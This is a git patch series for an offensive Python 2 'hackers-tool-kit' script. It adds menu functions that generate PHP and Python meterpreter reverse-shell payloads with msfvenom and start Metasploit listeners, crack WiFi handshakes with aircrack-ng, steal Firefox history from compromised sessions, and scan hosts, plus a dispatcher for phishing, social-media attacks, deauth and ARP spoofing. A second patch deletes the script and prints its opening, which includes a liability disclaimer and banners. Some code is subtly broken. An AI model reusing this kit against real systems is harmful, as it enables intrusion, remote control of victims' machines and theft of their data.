+#-----------------------------# +def chains(): + h = raw_input("Enter Browser: ") + j = raw_input("Enter Website: ") + a = 'proxychains {0} {1}'.format(h,j) + os.system(a) +#---------------------------# +#USE PROXYCHAINS FOR WEB END# + + +#GET HOST MYSQL VERSION START# +#----------------------------# +def mysqlv(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') + os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) + os.system('echo "show options\n" >> mysqlv.rc') + os.system('echo "run\n" >> mysqlv.rc') + os.system("service postgresql restart") + os.system('msfconsole -r mysqlv.rc') + os.system('rm -rf mysqlv.rc') +#--------------------------# +#GET HOST MYSQL VERSION END# + + +#CONNECT TO A HOST START# +#-----------------------# +def connect(): + h = raw_input("Enter Host: ") + print "\n" + print " How would you like to connect?" + print "---------------------------------------" + print "ssh: Secure Shell | Default Port = 22" + print "---------------------------------------" + print "telnet: Network Virtual Terminal | Default Port = 23" + print "---------------------------------------" + j = raw_input("Select Protocol: ") + a = '{0} {1}'.format(j,h) + os.system(a) +#---------------------# +#CONNECT TO A HOST END# + + + +#OPEN NEW TERMINAL START# +#-----------------------# +def terminal(): + os.system("gnome-terminal") +#---------------------# +#OPEN NEW TERMINAL END# + + +#AIRCRACK-NG [WIFI HACK] AUTOMATED START# +#---------------------------------------# +def aircrack(): + b = raw_input(G+"BSSID: \033[0m") + e = raw_input(G+"ESSID: \033[0m") + w = raw_input(G+"Wordlist: \033[0m") + h = raw_input(G+"Handshake file: \033[0m") + os.system("iwconfig") + i = raw_input(G+"Interface: \033[0m") + a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' + os.system(a) +#-------------------------------------# +#AIRCRACK-NG [WIFI HACK] AUTOMATED END# + + +#GET SOURCE CODE OF WEB START# +#----------------------------# +def source(): + t = raw_input(B+"Target:\033[0m ") + print Y+"\nWould you like to save source code in a file?\n\033[0m" + q = raw_input(R+"[y/n]:\033[0m ") + if q == "n": + an = 'curl {0}'.format(t) + os.system(an) + if q == "y": + ay = 'curl {0} >> /root/{1}.txt'.format(t,t) + os.system(ay) + print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) +#--------------------------# +#GET SOURCE CODE OF WEB END# + + +#WEB DIRECTORY SCAN START# +#------------------------# +def dirscan(): + t = raw_input(B+"Target URL:\033[91m ") + print "\033[0m" + a = 'dirb {0}'.format(t) + os.system(a) +#----------------------# +#WEB DIRECTORY SCAN END# + + + +#APACHE SERVER START# +#-------------------# +def aserver(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + print Y+"Starting Server\033[0m..." + os.system("service apache2 start") + br = raw_input(G+"Browser: \033[0m") + a = '{0} {1}'.format(br,ipaddr) + os.system(a) + stop = raw_input("hit enter to stop server: ") + print Y+"Stopping Server\033[0m..." + os.system("service apache2 stop") +#-----------------# +#APACHE SERVER END# + + +#CLEAR ALL START# +#---------------# +def clearall(): + os.system("clear") +#-------------# +#CLEAR ALL END# + + +#RUN A FILE START# +#----------------# +def run(): + print Y+"what program do you want to run the file with Example: python" + p = raw_input(N+"Program: ") + print "\n" + print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" + print "\n" + f = raw_input("Enter File: ") + print "\n" + print Y+"would you like to add arguments when running the file [y/n]\033[0m" + yn = raw_input(G+"[y or n]: \033[0m") + if yn == "n" : + a = '{0} {1}'.format(p,f) + os.system(a) + if yn == "y" : + arg = raw_input("Enter Arguments: ") + a = '{0} {1} {2}'.format(p,f,arg) + os.system(a) +#--------------# +#RUN A FILE END# + + +#REFRESH BANNER START# +#--------------------# +def banner(): + os.system("clear") + mainbanner() +#------------------# +#REFRESH BANNER END# + + +#PHP PAYLOAD START# +#-----------------# +def phpload(): + lhost = raw_input("LHOST: ") + lport = raw_input("LPORT: ") + filen = raw_input("File Name: ") + a = 'msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.php'.format(lhost,lport,filen) + os.system(a) + print "\nwould you like to run this file in a multi handler?" + yn = raw_input("[y/n]> ") + if yn == "y": + os.system('echo "use exploit/multi/handler\n" >> phpload.rc') + os.system('echo "set payload php/meterpreter/reverse_tcp\n" >> phpload.rc') + os.system('echo "set LHOST {0}\n" >> phpload.rc'.format(lhost)) + os.system('echo "set LPORT {0}\n" >> phpload.rc'.format(lport)) + os.system('echo "exploit\n" >> phpload.rc') + os.system("service postgresql restart") + os.system('msfconsole -r phpload.rc') + os.system('rm -rf phpload.rc') + if yn == "n": + os.system('echo " "') +#---------------# +#PHP PAYLOAD END# + + +#PYLOAD START# +#------------# +def pyload(): + lhost = raw_input("LHOST: ") + lport = raw_input("LPORT: ") + filen = raw_input("File Name: ") + a = 'msfvenom -p python/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.py'.format(lhost,lport,filen) + os.system(a) + print "\nwould you like to run this file in a multi handler?" + yn = raw_input("[y/n]> ") + if yn == "y": + os.system('echo "use exploit/multi/handler\n" >> pyload.rc') + os.system('echo "set payload python/meterpreter/reverse_tcp\n" >> pyload.rc') + os.system('echo "set LHOST {0}\n" >> pyload.rc'.format(lhost)) + os.system('echo "set LPORT {0}\n" >> pyload.rc'.format(lport)) + os.system('echo "exploit\n" >> pyload.rc') + os.system("service postgresql restart") + os.system('msfconsole -r pyload.rc') + os.system('rm -rf pyload.rc') + if yn == "n": + os.system('echo " "') +#----------# +#PYLOAD END# + + +#FOXHIS START# +#------------# +def foxhis(): + os.system('echo "sessions\n" >> foxhisses.rc') + os.system('echo "exit\n" >> foxhisses.rc') + os.system("service postgresql restart") + os.system('msfconsole -q -r foxhisses.rc') + os.system('rm -rf foxhisses.rc') + print "\n" + ses = raw_input("Session: ") + print "\nMaximum time (seconds) to wait for a response\n" + time = raw_input("Timeout: ") + os.system('echo "use firefox/gather/history\n" >> foxhis.rc') + os.system('echo "set session {0}\n" >> foxhis.rc'.format(ses)) + os.system('echo "set timeout {0}\n" >> foxhis.rc'.format(time)) + os.system('echo "run\n" >> foxhis.rc') + os.system('msfconsole -q -r foxhis.rc') + os.system('rm -fr foxhis.rc') +#----------# +#FOXHIS END# + + +#RHAWK START# +#-----------# +def rhawk(): + os.system("cd /root/hackers-tool-kit/redhawk/ && php rhawk.php") +#---------# +#RHAWK END# + + +#NANO START# +#----------# +def nano(): + print "opening nano in \033[93m/root/\033[0m folder" + os.system("sleep 2") + os.system("cd /root/ && nano") +#--------# +#NANO END# + + +#UPDATE HACKERS-TOOL-KIT START# +#-----------------------------# +def update(): + os.system("cd /root/hackers-tool-kit/ && python htkupdate.py") +#---------------------------# +#UPDATE HACKERS-TOOL-KIT END# + + +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# +#-------------------------------------------------------------------------------------------------# +def main(): + found = False + while not found: + x = raw_input(N+'\033[91m[\033[0mh-\033[94mT\033[0m-k\033[91m]\033[94m->\033[92m: \033[0m') + if x == "?": + help() + if x == "winload" : + winload() + if x == "clear" : + os.system("clear") + mainbanner() + if x == "andload": + andload() + if x == "command": + c = raw_input("Command: ") + os.system(c) + if x == "msfcon" : + os.system("service postgresql start") + os.system("msfconsole") + if x == "set": + os.system("setoolkit") + if x == "msfven": + print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" + v = raw_input(G+"MSFVENOM: \033[0m") + os.system("msfvenom", v) + if x == "gmail" : + gmail() + if x == "insta": + insta() + if x == "fb" : + fb() + if x == "ipgrab": + ipgrab() + if x == "myip": + myip() + if x == "wifite": + wifite() + if x == "mon" : + mon() + if x == "netdev" : + netdev() + if x == "scannet": + scannet() + if x == "exit" : + import sys + print "follow \033[92m@tuf_unkn0wn\033[0m on instagram" + sys.exit() + if x == "rebootl": + print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" + c = raw_input("[y/n]> ") + if c == "y" : + os.system("reboot") + if c == "n" : + os.system("clear") + mainbanner() + main() + if x == "port": + port() + if x == "info": + info() + if x == "sysinfo": + sysinfo() + if x == "msfex": + msfex() + if x == "udp": + udp() + if x == "tcp": + tcp() + if x == "syn": + syn() + if x == "msfpa": + msfpa() + if x == "msfau": + msfau() + if x == "ping" : + ping() + if x == "multih": + multih() + if x == "msfall": + msfall() + if x == "hydra" : + hydra() + if x == "cupp": + cupp() + if x == "vdir": + vdir() + if x == "monoff": + monoff() + if x == "vpn": + vpn() + if x == "vpnoff": + vpnoff() + if x == "slowl": + slowl() + if x == "pidox": + pidox() + if x == "specnet": + specnet() + if x == "pingen": + pingen() + if x == "reaver": + reaver() + if x == "deauth": + deauth() + if x == "macc": + macc() + if x == "macoff": + macoff() + if x == "arpspoof": + arpspoof() + if x == "sslscan": + sslscan() + if x == "payload": + payload() + if x == "crunch": + crunch() + if x == "traff": + traff() + if x == "resa": + resa() + if x == "resu": + resu() + if x == "hashid": + hashid() + if x == "restart": + restart() + if x == "medusa": + medusa() + if x == "wafwoof": + wafwoof() + if x == "cloud": + cloud() + if x == "brutex": + brutex() + if x == "methelp": + methelp() + if x == "winbyp": + winbyp() + if x == "exploit": + exploit() + if x == "phish": + phish() + if x == "datalist": + datalist() + if x == "msfev": + msfev() + if x == "upgrade": + upgrade() + if x == "nscript": + nscript() + if x == "sshver": + sshver() + if x == "chains": + chains() + if x == "mysqlv": + mysqlv() + if x == "connect": + connect() + if x == "terminal": + terminal() + if x == "aircrack": + aircrack() + if x == "source": + source() + if x == "dirscan": + dirscan() + if x == "aserver": + aserver() + if x == "clearall": + clearall() + if x == "run": + run() + if x == "banner": + banner() + if x == "phpload": + phpload() + if x == "pyload": + pyload() + if x == "foxhis": + foxhis() + if x == "rhawk": + rhawk() + if x == "nano": + nano() + if x == "update": + update() + found = True +mainbanner() +main() +#-------------------------------------------------------------------------------------------------# +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From da0bbb75306bbf7159e47bf5af5a5c4747a03869 Mon Sep 17 00:00:00 2001 From: tuf_unkn0wn <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Mon, 3 Jun 2019 02:14:53 +0100 Subject: [PATCH 171/214] Delete htk.py --- htk.py | 3208 -------------------------------------------------------- 1 file changed, 3208 deletions(-) delete mode 100644 htk.py diff --git a/htk.py b/htk.py deleted file mode 100644 index 6709cc8..0000000 --- a/htk.py +++ /dev/null @@ -1,3208 +0,0 @@ -#!/usr/local/bin/python -# coding: latin-1 -#if you use this code give me credit @tuf_unkn0wn -#i do not give you permission to show / edit this script without my credit -#to ask questions or report a problem message me on instagram @unkn0wn_bali -""" - - - ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ -▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ -▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ -░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ -░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ - ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ - ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ - ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ - ░ ░ - - -""" -#WARNING START# -#-------------# -from tkinter import * -win = Tk() -warn ='I AM NOT RESPONSIBLE FOR ANY DAMAGE CAUSED WITH THIS TOOL WHATEVER YOU DO WITH THIS TOOL IS ON YOU' -messageVar = Message(win, text = warn) -messageVar.config(bg='red') -messageVar.pack( ) -win.title('HTK: Warning!') -button = Button(win, text='OK', width=25, command=win.destroy) -button.pack() -win.mainloop() -#-----------# -#WARNING END# - -#this is the loading screen \ the imports START# -#----------------------------------------------# -import os -print "Starting hackers-tool-kit... [ * ]-[0%]" -import platform -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[5%]" -import webbrowser -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[9%]" -import hashlib -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[14%]" -import subprocess -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[19%]" -import zipfile -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[23%]" -import colorama -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[25%]" -from modules import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[26%]" -import modules.colors -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[27%]" -import builtwith -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[29%]" -from urllib2 import urlopen -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[31%]" -from urllib2 import URLError -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[34%]" -from urllib2 import HTTPError -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[38%]" -from urllib import urlencode -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[39%]" -from plugins.DNSDumpsterAPI import DNSDumpsterAPI -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[41%]" -import whois -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[45%]" -import json -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[47%]" -from urlparse import urlparse -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[50%]" -from re import search, sub -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[55%]" -import cookielib -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[56%]" -import socket -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[59%]" -from scapy.all import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[60%]" -from threading import Thread, active_count -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[63%]" -import random -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[67%]" -import string -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[70%]" -import signal -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[73%]" -import ssl -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[79%]" -import argparse -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[83%]" -import sys -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[86%]" -import socks -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[89%]" -import mechanize -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[90%]" -import requests -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[94%]" -import time -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[96%]" -from datetime import datetime -now = datetime.now() -hour = now.hour -minute = now.minute -day = now.day -month = now.month -year = now.year -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[99%]" -sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) -Gb = random._urandom(20000) -bytes = random._urandom(20000) -Kb = random._urandom(20000) -#COLOR VARIABLES START# -#---------------------# -r = '\033[31m' -W = '\033[90m' -R = '\033[91m' -N = '\033[0m' -G = '\033[92m' -B = '\033[94m' -Y = '\033[93m' -LB = '\033[1;36m' -P = '\033[95m' -Bl = '\033[30m' -O = '\033[33m' -p = '\033[35m' -#-------------------# -#COLOR VARIABLES END# - -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" -os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @tuf_unkn0wn\a'") -os.system("service tor start") -os.system("service postgresql start") -os.system("clear") -#----------------------------------------------# -#this is the loading screen \ the imports END# - - -#MAIN STARTING BANNER START# -#--------------------------# -def mainbanner1(): - os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") - print N+"""\033[34m - .............. \033[0mtype ? for help\033[34m - ..,;:ccc,. - ......''';lxO. - .....''''..........,:ld; - .';;;:::;,,.x, - ..'''. 0Xxoc:,. ... - .... ,ONkc;,;cokOdc',. - . OMo ':ddo. - dMc :OO; - 0M. .:o. - ;Wd - ;XO, \033[93mCreated By @tuf_unkn0wn On Instagram\033[34m - ,d0Odlc;,.. - ..',;:cdOOd::,. - .:d;.':;. - 'd, .' - ;l .. - .o - c - .' - .\033[92m - ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ - ██ ██ ▀▀▀██▀▀▀ ██ ██▀ - ██ ██ ██ ██▄██ - ████████ ██ █████ - ██ ██ █████ ██ █████ ██ ██▄ - ██ ██ ██ ██ ██▄ - ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m - ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ - ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ - ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - """.decode('utf-8') -def mainbanner2(): - print """ - type ? for help -\033[92m - ▄█ ▄█ ▄█ - ███ ███ ███ - ███▌ ███▌ ███▌ - ███▌ ███▌ ███▌ - ███▌ ███▌ ███▌ - ███ ███ ███ - ███ ███ ███ - █▀ █▀ █▀ - - ┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ - ├─┤├─┤│ ├┴┐├┤ ├┬┘└─┐\033[90m - ┴ ┴┴ ┴└─┘┴ ┴└─┘┴└─└─┘ - ┌┬┐┌─┐┌─┐┬ ┬┌─┬┌┬┐\033[92m - │ │ ││ ││───├┴┐│ │ - ┴ └─┘└─┘┴─┘ ┴ ┴┴ ┴ \033[0m -Created By @tuf_unkn0wn - """.decode('utf-8') -def mainbanner3(): - print """\033[91m - ▒\033[90m██ ██\033[91m▒ ▒\033[90m██ ██\033[91m▒ - ▒▒ \033[90m█ █ \033[91m▒░ ▒▒ \033[90m█ █ \033[91m▒░ - ░░ \033[90m█ \033[91m░ ░░ \033[90m█ \033[91m░ - ░ \033[90m█ █ \033[91m▒ ░ \033[90m█ █ \033[91m▒ - ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ - ▒▒ ░ ░▓ ░ ▒▒ ░ ░▓ ░ - ░░ ░▒ ░ ░░ ░▒ ░ - ░ ░ ░ ░ - ░ ░ ░ ░ - \033[90m - - ████████████████████ - ██ ██\033[91m - ▒▒ ▒▒ - ░░ ░░ - ░ ░ - ░ ░\033[0m - -888 888 88888888888 888 d8P -888 888 888 888 d8P -888 888 888 888 d8P \033[1;36m -8888888888 888 888d88K -888 888 888 8888888b\033[0m -888 888 888888 888 888888 888 Y88b -888 888 888 888 Y88b -888 888 888 888 Y88b - Created By @tuf_unkn0wn On Instagram - type ? for help - """.decode('utf-8') -def mainbanner4(): - print P+""" - .S S. sdSS_SSSSSSbs .S S. - .SS SS. YSSS~S%SSSSSP .SS SS. - S%S S%S S%S S%S S&S - S%S S%S S%S S%S d*S - S%S SSSS%S S&S S&S .S*S - S&S SSS&S S&S S&S_sdSSS - S&S S&S S&S S&S~YSSY%b - S&S S&S S&S S&S `S% - S*S S*S S*S S*S S% - S*S S*S S*S S*S n& - S*S S*S S*S S*S wS& - SSS S*S S*S S*S 0 SS - h SP SP SP n - a Y Y Y k - c n - k e r s - t o o l - k i t by @tuf_u\033[0m - - type ? for help - """.decode('utf-8') -def mainbanner5(): - print R+""" - ██▀███ ▄▄▄ ▒███████▒ ▒█████ ██▀███ - ▓██ ▒ ██▒▒████▄ ▒ ▒ ▒ ▄▀░▒██▒ ██▒▓██ ▒ ██▒ - ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██░ ██▒▓██ ░▄█ ▒ - ▒██▀▀█▄ ░██▄▄▄▄██ ▄▀▒ ░▒██ ██░▒██▀▀█▄ - ░██▓ ▒██▒ ▓█ ▓██▒▒███████▒░ ████▓▒░░██▓ ▒██▒ - ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░░▒▒ ▓░▒░▒░ ▒░▒░▒░ ░ ▒▓ ░▒▓░ - ░▒ ░ ▒░ ▒ ▒▒ ░░░▒ ▒ ░ ▒ ░ ▒ ▒░ ░▒ ░ ▒░ - ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░ ░ ▒ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ - ░\033[0m - .,,,,,,,,,,.,,,.....,........................... - ...,...,....,.,..,......,,,,.......,.,,,,,,,.,,, - ..,......,.....,,.,........,,...........,,.,.... - ...,.,,.,....,,,,..,..,,,,,,......,,.,...,..../ - ***********************//***/***//**/********** - ****************** ****************** @tuf_unkn0wn - *,*****,*,******** ***,************** - **,,,,,,,,,,,,,,*,,,,, *,,,,,,,,,*,,,,,,,,,** type ? for help - ,,,,,,,,,,,,,,,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,, - ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, - ***********************************************\033[91m - - ▄████▄ █ ██ ▄▄▄█████▓ ██████ - ▒██▀ ▀█ ██ ▓██▒▓ ██▒ ▓▒▒██ ▒ - ▒▓█ ▄ ▓██ ▒██░▒ ▓██░ ▒░░ ▓██▄ - ▒▓▓▄ ▄██▒▓▓█ ░██░░ ▓██▓ ░ ▒ ██▒ - ▒ ▓███▀ ░▒▒█████▓ ▒██▒ ░ ▒██████▒▒ - ░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ▒ ░░ ▒ ▒▓▒ ▒ ░ - ░ ▒ ░░▒░ ░ ░ ░ ░ ░▒ ░ ░ - ░ ░░░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ - ░ \033[0m - """.decode('utf-8') -def mainbanner6(): - print """ - |-|____________________ - /|_|_\ /__,''___ /____ /| - |\033[90mHHHHHH\033[0m| \_/ |\033[90mHHHHH\033[0m|/| - |``````|_________|`````| | - | \033[93m~~~~~~~~~~~~~~\033[0m | | - | .-/\-, | | - | _\\//_ | | - | \033[92m| /(_)|\033[0m | | - |\033[92m_______|_||.-.|_______\033[0m|/| - |\033[90mHHHHHHH\033[0m| ||:_ |\033[90mHHHHHHH\033[0m|/| - |\033[92m```````|_||:_)|```````\033[0m| | - | \033[92m|______| \033[0m| | - | ______ | | - | (__\033[90m24\033[0m__) | | - | ~~~~~~~~ | | - | By @tuf_unkn0wn | | - |______________________|/ - \033[91m - ) ( ) ( - ( /( )\ ) ( /( )\ ( ( ( - )\()|(_| /( ( )\()) ((_)))\ ( )\))( ( - ((_)\ _ )(_)) )\((_)\ _ /((_) )\ )((_))\ )\ - | |(_) ((_)_ ((_) |(_) | (_))( _(_/( (()(_|(_) - | '_ \ / _` / _|| / / | | || | ' \)) _` |(_-< - |_.__/_\__,_\__||_\_\ |_|\_,_|_||_|\__, |/__/ - |___/ - \033[90m - ) - (\033[33m - _ \033[0m___________ \033[90m)\033[33m - [_[\033[0m___________\033[91m#\033[0m - type ? for help - """.decode('utf-8') -def mainbanner7(): - os.system("cat /root/hackers-tool-kit/tools/skull.txt") -def mainbanner8(): - print """ - type ? for help\033[91m - -@@@ /$$ /$$ @@@ -@@@ | $$ | $$ @@@ -@@! | $$ | $$ @@! -!@! | $$$$$$$$ !@! -!!@ | $$__ $$ !!@ -!!! | $$ | $$ !!! -!!: | $$ | $$ !!: -:!: |__/ |__/ :!: -@@@ @@@\033[94m -@@@ @@@ -@@! @@! -!@! /$$$$$$$$ !@! -!!@ |__ $$__/ !!@ -!!! | $$ !!! -!!: | $$ !!: -:!:---------------| $$---------------:!: -@@@ | $$ @@@ -@@@ | $$ @@@ -@@! |__/ @@! -!@! !@!\033[91m -!!@ !!@ -!!! /$$ /$$ !!! -!!: | $$ /$$/ !!: -:!: | $$ /$$/ :!: -@@@ | $$$$$/ @@@ -@@@ | $$ $$ @@@ -@@! | $$\ $$ @@! -!@! | $$ \ $$ !@! -!!@ |__/ \__/ !!@ -!!! !!! -!!: !!: -:!: :!:\033[92m - :: :: -: @tuf_unkn0wn :\033[0m -""" -def mainbanner9(): - print """ -\033[91m╔\033[0m██████████████████████████████████████████████████████████████████\033[91m═╗ -║ ║ -\033[33m║ ║ -║\033[0m ▄▀▀▀▀▄ ▄▀▀▄ ▀▀▄ ▄▀▀▀▀▄ ▄▀▀▀█▀▀▄ ▄▀▀█▄▄▄▄ ▄▀▀▄ ▄▀▄ \033[33m║ -\033[93m║\033[0m █ █ ▐ █ ▀▄ ▄▀ █ █ ▐ █ █ ▐ ▐ ▄▀ ▐ █ █ ▀ █ \033[93m║ -║\033[0m ▀▄ ▐ █ ▀▄ ▐ █ █▄▄▄▄▄ ▐ █ █ \033[93m║ -\033[92m║\033[0m ▀▄ █ █ ▀▄ █ █ █ ▌ █ █ \033[92m║ -║\033[0m █▀▀▀ ▄▀ █▀▀▀ ▄▀ ▄▀▄▄▄▄ ▄▀ ▄▀ \033[92m║ -\033[1;36m║\033[0m ▐ █ ▐ █ █ ▐ █ █ \033[1;36m║ -║\033[0m ▐ ▐ ▐ ▐ ▐ \033[1;36m║ -\033[94m║\033[0m ▄▀▀█▄▄ ▄▀▀▀▀▄ ▄▀▀▄ ▄▀▀▄ ▄▀▀▄ ▀▄ \033[94m║ -║\033[0m █ ▄▀ █ █ █ █ █ ▐ █ █ █ █ █ \033[94m ║ -\033[34m║\033[0m ▐ █ █ █ █ ▐ █ █ ▐ █ ▀█ \033[34m║ -║\033[0m █ █ ▀▄ ▄▀ █ ▄ █ █ █ \033[34m║ -\033[95m║\033[0m ▄▀▄▄▄▄▀ ▀▀▀▀ ▀▄▀ ▀▄ ▄▀ ▄▀ █ \033[95m║ -║\033[0m █ ▐ ▀ █ ▐ \033[95m║ -\033[35m║\033[0m ▐ ▐ \033[35m║ -║ ║\033[1;31m -╚═\033[0m█████████████████████████████████████████████████████████████████\033[1;31m═╝\033[0m - type ? for help - """.decode('utf-8') - -def mainbanner10(): - print """\033[0m - ░░░▓█▒░▒▒▒▓▓░ - ░░░░░▓▓░▒▓▓▓▓▓▓▓▓▓▓▓█░░░░ - ░░█▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░ - ░░█▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░░ - ░░░░ ░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██░░ ░░░░ - ░░░░░░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓████████▒░░ ░░▓▒▒▒▒▓░░ - ░▓░▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████▓░░░░░▒▓▓▓▓▓▓███████ - ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█████████████████████████████████░░░░░░░ - ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓▓██████████████████████████████████░ - ░█▓▓▓██████████▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████████████████████▒░ - ░▒▓▓▓████░░░░░░░░░░░░░▒▓███████████████████████████████████████░░ - ░▓▓▓███▒▒░░░░░░░░░░░░░░░░░░░░▒██▓██████████████████████████████░░ - ░█▓▓███░░░░░░░░░░░░░░░░░░░░░░░░░░░▒███████████████████████████▓░ - ░█▓▓███▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░█████████████████░░░░░░░░░ - ░░▓▓████░░░░░░░░░░░░░░░░░░░░████▓░░░░░░░░█████████████▓░ - ░█▓█████░░░░░░░░░░░░░░░░░▒░████████░░░░░░░████████████░░ - ░░▒▓█████░░░░▒░▓████░░░░░░▒░█████████▓░░░░░███████████▓░░░░░ - ░░▓▒▓█████░░░▒░▓██████░░░░░▒░▓█████████░░░░░▒██████████░░▒▒▓░ - ░░█▒▓▓████▒░░░░███████▓░░░░░▒░░████████▓░░░░▒████████░▓░▓▓░▓▓░░░ - ░░░▒▓▓▓████░░░░▓██████▓░░░░░░▒░░░▓█████░░░░░███████▓░▓▓▓▓▓▓▒▒░░░ - ░▒▒▓▓████░░▒░░██████░░░░░░░░░▒░░░░░░▒░░░░░████▓░▒▓▓▓▓▓░░░▒▒▒░▒░ - ░░▓▓████░░░▒░░▒███░░▒▓▒▒█▓░░░░░░░░░░░░░▒██▓▒▓▓▓▓▓▓▒░░░░░░▒▒▒▒▒░░ - ░░░░████░░░░░░░░░░░░░█░░▓█▓░░░░██████████▒▒▓▓▓▓░░░░░▒░░░░░▒▒▒▒▒░ - ░░░░░░ ░░████░░░░░░░░░░░░░░░░░░░░░░███████▓▒▓▓░░░░░░░ ░░░░░░░▒▒▒░▒░ - ░▒░░▒░░░▒░▒█████▓▒░▒█░░░░░░░░░░░░░░░░███▓▒▓▒░░ ░▒░░░░▒▒▒░░░░ - 